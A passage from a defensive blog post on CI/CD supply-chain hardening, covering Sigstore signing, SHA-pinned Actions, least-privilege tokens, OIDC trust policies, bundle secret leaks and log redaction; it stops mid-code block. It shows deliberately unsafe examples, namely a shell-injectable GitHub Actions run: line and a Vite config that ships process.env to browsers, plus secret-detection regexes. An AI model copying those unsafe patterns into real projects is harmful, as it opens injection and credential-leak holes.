&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; &lt;strong&gt;cosign keyless signing via Sigstore.&lt;/strong&gt; Sigstore is a free signing service; &lt;strong&gt;Fulcio&lt;/strong&gt; is its short-lived certificate authority; &lt;strong&gt;Rekor&lt;/strong&gt; is its public transparency log; the &lt;strong&gt;SET&lt;/strong&gt; (Signed Entry Timestamp) is Rekor's tamper-proof timestamp binding the signature to a moment when the cert was still valid. GitHub Actions OIDC issues a short-lived signing identity, Fulcio mints a certificate valid for ~10 minutes, and the signature is recorded in Rekor.&lt;/p&gt;

&lt;p&gt;Treat Rekor as load-bearing, not optional. The Fulcio cert expires almost immediately; what makes a keyless signature verifiable hours or years later is the Rekor inclusion proof. A &lt;code&gt;cosign verify&lt;/code&gt; that doesn't check the SET is meaningless after cert expiry.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Verify with workflow-path anchoring&lt;/strong&gt;, not a loose org regex:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cosign verify &amp;lt;image&amp;gt;@&amp;lt;digest&amp;gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-identity-regexp&lt;/span&gt; &lt;span class="s2"&gt;"^https://github&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;com/yourorg/yourrepo/&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;github/workflows/release&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;yml@refs/heads/main$"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-oidc-issuer&lt;/span&gt; &lt;span class="s2"&gt;"https://token.actions.githubusercontent.com"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-github-workflow-repository&lt;/span&gt; &lt;span class="s2"&gt;"yourorg/yourrepo"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-github-workflow-ref&lt;/span&gt; &lt;span class="s2"&gt;"refs/heads/main"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;An open &lt;code&gt;^https://github.com/yourorg/&lt;/code&gt; regex matches any workflow under the org, including a malicious workflow added in a fork and run via &lt;code&gt;pull_request_target&lt;/code&gt;. Anchor on the workflow path, anchor on the ref, AND test the regex with a known-different workflow before relying on it. Unanchored regexes (missing &lt;code&gt;^&lt;/code&gt; or &lt;code&gt;$&lt;/code&gt;) match more workflows than you intended.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Signing alone does not satisfy SLSA&lt;/strong&gt; (Supply-chain Levels for Software Artifacts, a framework for grading the trustworthiness of build provenance). The signature proves who built the image, not how. SLSA Build L3 requires provenance attestations in &lt;code&gt;in-toto&lt;/code&gt; format (the &lt;code&gt;https://slsa.dev/provenance/v1&lt;/code&gt; predicate), produced by &lt;code&gt;cosign attest --predicate&lt;/code&gt; from a hardened, isolated builder such as &lt;code&gt;slsa-github-generator&lt;/code&gt;. Verify with &lt;code&gt;cosign verify-attestation&lt;/code&gt;. The signature is the foundation. The attestation chain is the rest of the building.&lt;/p&gt;
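&lt;p&gt;As a sketch, the attest-and-verify flow looks like this; the image reference, predicate file, and identity regex are placeholders you'd substitute for your own:&lt;/p&gt;

```shell
# Attach a SLSA provenance attestation to the pushed digest (keyless).
# provenance.json is your generated in-toto predicate; the image ref is a placeholder.
cosign attest --predicate provenance.json \
  --type slsaprovenance \
  registry.example.com/app@sha256:<digest>

# Verification must bind identity, not just confirm a signature exists.
cosign verify-attestation \
  --type slsaprovenance \
  --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
  --certificate-identity-regexp "^https://github.com/yourorg/yourrepo/" \
  registry.example.com/app@sha256:<digest>
```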

&lt;p&gt;&lt;strong&gt;A signature you don't verify at deploy time is theatre.&lt;/strong&gt; Wire &lt;code&gt;cosign verify&lt;/code&gt; into a Kubernetes admission controller (&lt;strong&gt;Kyverno&lt;/strong&gt; &lt;code&gt;verifyImages&lt;/code&gt;, &lt;strong&gt;Connaisseur&lt;/strong&gt;, or &lt;strong&gt;Sigstore policy-controller&lt;/strong&gt;) so the cluster refuses to schedule unsigned or wrong-identity images. GitHub's native &lt;code&gt;gh attestation verify&lt;/code&gt; (GA 2024) is the simplest verification entry-point if you're not on Kubernetes.&lt;/p&gt;
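&lt;p&gt;A minimal sketch of that admission gate as a Kyverno policy, assuming keyless signatures as above; the policy name, registry pattern, and workflow identity are placeholders:&lt;/p&gt;

```yaml
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-signed-images   # placeholder name
spec:
  validationFailureAction: Enforce
  webhookTimeoutSeconds: 30
  rules:
    - name: verify-signature
      match:
        any:
          - resources:
              kinds: [Pod]
      verifyImages:
        - imageReferences:
            - "123456789012.dkr.ecr.us-east-1.amazonaws.com/*"  # placeholder registry
          attestors:
            - entries:
                - keyless:
                    issuer: "https://token.actions.githubusercontent.com"
                    subject: "https://github.com/yourorg/yourrepo/.github/workflows/release.yml@refs/heads/main"
```

&lt;p&gt;Unsigned images, or images signed by any other workflow identity, fail admission instead of reaching a node.&lt;/p&gt;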

&lt;p&gt;Stack-agnostic: cosign works on any container image registry (ECR, GHCR, ACR, GAR, Harbor, Artifactory, Quay) and on generic blobs via &lt;code&gt;cosign sign-blob&lt;/code&gt;. Sigstore Fulcio currently trusts OIDC issuers from GitHub, GitLab, Buildkite, CircleCI, Google, and Microsoft: same &lt;code&gt;cosign sign --identity-token&lt;/code&gt; flow, different &lt;code&gt;iss&lt;/code&gt; claim. PEP 740 attestations + &lt;code&gt;python -m sigstore&lt;/code&gt; cover Python wheels; &lt;code&gt;sigstore-maven-plugin&lt;/code&gt; covers Java JARs.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 7: Tag → Commit (What does this &lt;code&gt;uses:&lt;/code&gt; / include / plugin actually point to?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;This is the boundary tj-actions exploited.&lt;/strong&gt; A line like &lt;code&gt;uses: tj-actions/changed-files@v45&lt;/code&gt; resolves at build time to whatever commit the &lt;code&gt;v45&lt;/code&gt; tag currently references. Tags are mutable. Commit SHAs are not.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; pin every external &lt;code&gt;uses:&lt;/code&gt; to a 40-character commit SHA with a tag comment.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd&lt;/span&gt; &lt;span class="c1"&gt;# v6&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;pulumi/actions@8582a9e8cc630786854029b4e09281acd6794b58&lt;/span&gt; &lt;span class="c1"&gt;# v6&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Enforce in CI with &lt;code&gt;pinact run --check --verify&lt;/code&gt;. It fails the PR if anything is unpinned, and flags drift between the pinned SHA and the SHA the upstream tag currently resolves to. It catches inadvertent drift. It does not by itself defeat a tag-rewrite attack: &lt;code&gt;pinact&lt;/code&gt; will surface the mismatch but cannot tell you which side is hostile. Pair it with a higher-trust signal: Sigstore attestation verification, GitHub's &lt;code&gt;gh attestation verify&lt;/code&gt; for Action artifacts (GA 2024), &lt;code&gt;StepSecurity Harden-Runner&lt;/code&gt; for egress-policy + tampering detection on the runner, or human review of any flagged drift.&lt;/p&gt;

&lt;p&gt;When we started, none of our 110 &lt;code&gt;uses:&lt;/code&gt; lines were SHA-pinned. That included &lt;code&gt;pulumi/actions&lt;/code&gt; (cloud-deploy authority), &lt;code&gt;lasith-kg/dispatch-workflow&lt;/code&gt; (single maintainer), &lt;code&gt;aws-actions/configure-aws-credentials&lt;/code&gt; (×11), and &lt;code&gt;docker/build-push-action&lt;/code&gt; (×3, ECR push). They all are now, with a CI gate so they stay that way.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Translate to your CI:&lt;/strong&gt; GitLab &lt;code&gt;include:&lt;/code&gt; should pin &lt;code&gt;ref:&lt;/code&gt; to a SHA, not &lt;code&gt;main&lt;/code&gt;. Buildkite plugins should pin &lt;code&gt;plugin@&amp;lt;sha&amp;gt;&lt;/code&gt;, not &lt;code&gt;@v1&lt;/code&gt;. CircleCI orbs are best inlined or vendored. Jenkins shared libraries should pin &lt;code&gt;@Library('foo@&amp;lt;sha&amp;gt;')&lt;/code&gt;. Bazel modules pin via &lt;code&gt;MODULE.bazel.lock&lt;/code&gt;. The control: no mutable references to third-party code anywhere in CI config.&lt;/p&gt;
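&lt;p&gt;A sketch of the GitLab variant; the project path, file, and SHA are placeholders:&lt;/p&gt;

```yaml
include:
  - project: platform/ci-templates                  # placeholder project path
    ref: 8a9e2cc630786854029b4e09281acd6794b58f1    # full commit SHA, never a branch name
    file: /templates/deploy.yml
```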

&lt;h4&gt;
  
  
  Boundary 8: Workflow → Secrets (What can a single compromised step exfiltrate?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; any step in a workflow inherits the workflow's permissions and any environment-scoped secrets. A compromised Action running with &lt;code&gt;permissions: write-all&lt;/code&gt; receives a &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; with write scopes across that repository's API surface (contents, issues, pull requests, packages, deployments) for the duration of that workflow run.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; default-deny at workflow level, grant per-job:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{}&lt;/span&gt;

&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;contents&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;read&lt;/span&gt;       &lt;span class="c1"&gt;# for checkout&lt;/span&gt;
      &lt;span class="na"&gt;id-token&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;      &lt;span class="c1"&gt;# for AWS OIDC&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;zizmor&lt;/code&gt; (free workflow-security linter) audits this on every PR. When we ran it the first time, 8 of our 16 workflows were running &lt;code&gt;permissions: write-all&lt;/code&gt;. Today none of them do.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reusable workflows (&lt;code&gt;workflow_call&lt;/code&gt;)&lt;/strong&gt; inherit the caller's &lt;code&gt;permissions:&lt;/code&gt; unless explicitly overridden. &lt;code&gt;secrets: inherit&lt;/code&gt; on the caller hands every repository secret to the callee. Pass secrets explicitly by name and re-declare &lt;code&gt;permissions:&lt;/code&gt; in every reusable workflow.&lt;/p&gt;
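&lt;p&gt;A sketch of the explicit pattern; the workflow path and secret name are placeholders:&lt;/p&gt;

```yaml
jobs:
  deploy:
    uses: ./.github/workflows/deploy.yml   # placeholder reusable workflow
    permissions:
      contents: read
      id-token: write
    secrets:
      # named explicitly -- no `secrets: inherit`
      DEPLOY_ROLE_ARN: ${{ secrets.DEPLOY_ROLE_ARN }}
```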

&lt;p&gt;&lt;strong&gt;&lt;code&gt;pull_request_target&lt;/code&gt; is the single highest-severity GitHub Actions footgun.&lt;/strong&gt; Unlike &lt;code&gt;pull_request&lt;/code&gt;, it runs in the context of the base repository with the base repo's &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; and access to repository secrets. If you &lt;code&gt;actions/checkout&lt;/code&gt; the PR head, you've executed an attacker's code with privileged credentials. Default rule: never check out PR head code in a &lt;code&gt;pull_request_target&lt;/code&gt; workflow; never run third-party scripts inside one.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Replace long-lived AWS keys with GitHub OIDC.&lt;/strong&gt; The role's trust policy restricts assumption to your repository's workflows; CI never holds a credential that survives the run. The footgun: a &lt;code&gt;sub&lt;/code&gt; condition like &lt;code&gt;repo:org/*:*&lt;/code&gt; hands AWS-role assumption to any workflow run from any branch, including a fork's PR. Anchor &lt;code&gt;sub&lt;/code&gt; to a specific repo + ref:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="nl"&gt;"Condition"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"StringEquals"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"token.actions.githubusercontent.com:aud"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sts.amazonaws.com"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"StringLike"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"token.actions.githubusercontent.com:sub"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"repo:yourorg/yourrepo:ref:refs/heads/main"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For higher precision than &lt;code&gt;sub&lt;/code&gt;, use &lt;code&gt;job_workflow_ref&lt;/code&gt;: it constrains assumption to a specific leaf workflow file and is resilient to a malicious reusable-workflow caller inside the same repo. AWS, GCP Workload Identity Federation, and Azure federated credentials all expose it.&lt;/p&gt;
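&lt;p&gt;A sketch of the tighter trust-policy condition; the repo and workflow path are placeholders:&lt;/p&gt;

```json
"StringLike": {
  "token.actions.githubusercontent.com:job_workflow_ref":
    "yourorg/yourrepo/.github/workflows/deploy.yml@refs/heads/main"
}
```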

&lt;p&gt;CI translations: GitLab CI uses &lt;code&gt;id_tokens:&lt;/code&gt; per-job and CI/CD job-token scope allowlists; Buildkite uses agent-queue ACLs and Vault Agent for secret distribution; CircleCI uses restricted contexts; Jenkins uses &lt;code&gt;withCredentials&lt;/code&gt; per-step plus folder-level credential isolation. Different YAML, same default-deny pattern.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 9: Untrusted input → Shell (CWE-78 in CI)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; GitHub-context fields like &lt;code&gt;github.event.comment.body&lt;/code&gt;, &lt;code&gt;pull_request.title&lt;/code&gt;, &lt;code&gt;head_ref&lt;/code&gt; are attacker-controlled. When interpolated directly into a &lt;code&gt;run:&lt;/code&gt; block, they become shell injection. The same class exists everywhere: GitLab &lt;code&gt;$CI_*&lt;/code&gt; from triggered events, Jenkins parameterised builds, Buildkite &lt;code&gt;meta-data&lt;/code&gt;, Azure &lt;code&gt;variables&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Unsafe:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;echo "Reviewing&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.event.comment.body }}"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Safe:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;BODY&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.event.comment.body }}&lt;/span&gt;
&lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;echo "Reviewing&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;$BODY"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the boundary the lede sat on. The fix was a four-line diff. The control that catches the next one (&lt;code&gt;actionlint&lt;/code&gt; for syntax + &lt;code&gt;zizmor&lt;/code&gt; for security patterns, both as required PR checks) was one commit. Cross-CI: &lt;code&gt;semgrep --config=p/ci&lt;/code&gt; covers most major vendors with one ruleset.&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 3 Runtime-side: what ships and what leaks
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Boundary 10: Build host env → Client bundle (Whose secrets ship to the browser?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; a &lt;code&gt;define&lt;/code&gt; block in your bundler (Vite, Webpack, esbuild, Rollup) that spreads &lt;code&gt;process.env&lt;/code&gt; into the client bundle. Frontend bundlers replace &lt;code&gt;process.env.X&lt;/code&gt; with the value at build time, so whatever was in the build host's env becomes a string literal in the JS shipped to every browser.&lt;/p&gt;

&lt;p&gt;We had this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// vite.config.ts&lt;/span&gt;
&lt;span class="nx"&gt;define&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;process.env&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;   &lt;span class="c1"&gt;// TODO: fix this later&lt;/span&gt;
&lt;span class="p"&gt;},&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Safe:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="nx"&gt;define&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;process.env.PUBLIC_API_URL&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;stringify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;PUBLIC_API_URL&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
  &lt;span class="c1"&gt;// explicit allowlist; nothing implicit&lt;/span&gt;
&lt;span class="p"&gt;},&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Same principle for &lt;code&gt;NEXT_PUBLIC_*&lt;/code&gt;, &lt;code&gt;VITE_*&lt;/code&gt;, &lt;code&gt;REACT_APP_*&lt;/code&gt;, and &lt;code&gt;EXPO_PUBLIC_*&lt;/code&gt; env vars: assume they are browser-readable and never put secrets behind these prefixes. The same failure mode exists in mobile: Android &lt;code&gt;BuildConfig.API_KEY = "$apiKey"&lt;/code&gt; from a checked-in &lt;code&gt;gradle.properties&lt;/code&gt;; iOS API keys in &lt;code&gt;Info.plist&lt;/code&gt; or &lt;code&gt;xcconfig&lt;/code&gt;. Assume any string in the artefact is extractable.&lt;/p&gt;
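&lt;p&gt;One cheap backstop, sketched below: scan the emitted bundle text for credential-shaped strings before the artefact leaves CI. The function and patterns are illustrative, not a complete detector:&lt;/p&gt;

```typescript
// Post-build guard: fail CI if the emitted bundle contains strings that look
// like leaked credentials. Patterns are illustrative; extend for your providers.
const SECRET_PATTERNS: [string, RegExp][] = [
  ["AWS access key id", /AKIA[0-9A-Z]{16}/],
  ["GitHub token", /gh[pousr]_[A-Za-z0-9]{36,}/],
  ["Private key block", /-----BEGIN [A-Z ]*PRIVATE KEY-----/],
];

export function scanBundle(bundleText: string): string[] {
  const findings: string[] = [];
  for (const [name, re] of SECRET_PATTERNS) {
    if (re.test(bundleText)) findings.push(name);
  }
  return findings;
}

// A bundle that accidentally baked in an AWS key gets flagged;
// a clean bundle returns no findings.
const leaky = 'fetch(url, { headers: { key: "AKIAIOSFODNN7EXAMPLE" } })';
console.log(scanBundle(leaky));                      // flags the AWS key
console.log(scanBundle("const apiUrl = '/api/v1';")); // no findings
```

&lt;p&gt;Run it against &lt;code&gt;dist/**/*.js&lt;/code&gt; in the same job that builds the bundle, before upload.&lt;/p&gt;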

&lt;h4&gt;
  
  
  Boundary 11: Runtime → Logs (Are your sinks an exfiltration channel?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; logging frameworks default to verbose. CloudWatch, Datadog, Sentry retain log lines for weeks. A &lt;code&gt;console.log(req)&lt;/code&gt; in a request handler dumps the &lt;code&gt;Authorization&lt;/code&gt; header to a 30-day-retention log, accessible to any engineer with read access.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; redaction at the framework level (not per call-site):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="nx"&gt;pino&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;pino&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;logger&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;pino&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="na"&gt;redact&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;paths&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;req.headers.authorization&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;req.headers.cookie&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;config.headers.authorization&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;// catches Axios errors&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;*.password&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;*.token&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;*.secret&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="na"&gt;censor&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;[REDACTED]&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The one that bit us: AxiosError objects carry the original request configuration, including &lt;code&gt;Authorization&lt;/code&gt; headers. &lt;code&gt;logger.error(msg, axiosErr)&lt;/code&gt; without redaction quietly dumps every bearer token your service has ever forwarded.&lt;/p&gt;

&lt;p&gt;Every mature logger has the primitive: &lt;code&gt;structlog&lt;/code&gt; processors (Python), &lt;code&gt;logback&lt;/code&gt;'s &lt;code&gt;MaskingPatternLayout&lt;/code&gt; (Java), &lt;code&gt;zap&lt;/code&gt; / &lt;code&gt;zerolog&lt;/code&gt; field hooks (Go), &lt;code&gt;tracing&lt;/code&gt; field filters (Rust), &lt;code&gt;Rails.config.filter_parameters&lt;/code&gt; (Ruby), &lt;code&gt;Serilog.Enrichers.Sensitive&lt;/code&gt; (.NET). Last line of defence regardless of stack: an &lt;strong&gt;OpenTelemetry Collector&lt;/strong&gt; with an &lt;code&gt;attributes/delete&lt;/code&gt; processor that scrubs in transit before logs reach Datadog or CloudWatch.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The limit.&lt;/strong&gt; &lt;code&gt;pino&lt;/code&gt; redact is a denylist; it only scrubs the paths you list. Custom auth headers (&lt;code&gt;x-api-key&lt;/code&gt;, &lt;code&gt;x-vault-token&lt;/code&gt;), GraphQL &lt;code&gt;variables.password&lt;/code&gt;, &lt;code&gt;request.body.token&lt;/code&gt;, and provider-specific shapes are all easy to miss. Audit your redact paths against the actual headers and body shapes your services see, and re-audit when you add an integration.&lt;/p&gt;
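&lt;p&gt;One way to backstop the denylist, sketched in TypeScript: a key-name heuristic scrubber applied to the event object just before serialisation, so fields nobody listed still get caught. The &lt;code&gt;SENSITIVE&lt;/code&gt; pattern and object shapes here are illustrative:&lt;/p&gt;

```typescript
// Path denylists miss unknown shapes; a key-name heuristic applied recursively
// just before serialisation catches fields like x-api-key or variables.password
// that no one listed. Heuristic and illustrative -- tune SENSITIVE for your stack.
const SENSITIVE = /password|secret|token|authorization|api[-_]?key|cookie/i;

export function deepRedact(value: unknown): unknown {
  if (Array.isArray(value)) return value.map(deepRedact);
  if (value && typeof value === "object") {
    const out: Record<string, unknown> = {};
    for (const [k, v] of Object.entries(value as Record<string, unknown>)) {
      out[k] = SENSITIVE.test(k) ? "[REDACTED]" : deepRedact(v);
    }
    return out;
  }
  return value;
}

const event = {
  req: { headers: { "x-api-key": "sk-live-123", accept: "application/json" } },
  variables: { password: "hunter2" },
};
console.log(JSON.stringify(deepRedact(event)));
```

&lt;p&gt;A key-name heuristic over-redacts occasionally; for log sinks that's the right direction to fail in.&lt;/p&gt;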

&lt;h4&gt;
  
  
  Boundary 12: Dependency → Patch (Can you fix a CVE without a registry round-trip?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; vulnerable transitive dependency, no maintainer response, can't wait.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; force-pin the transitive with documented rationale and an expiry date:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
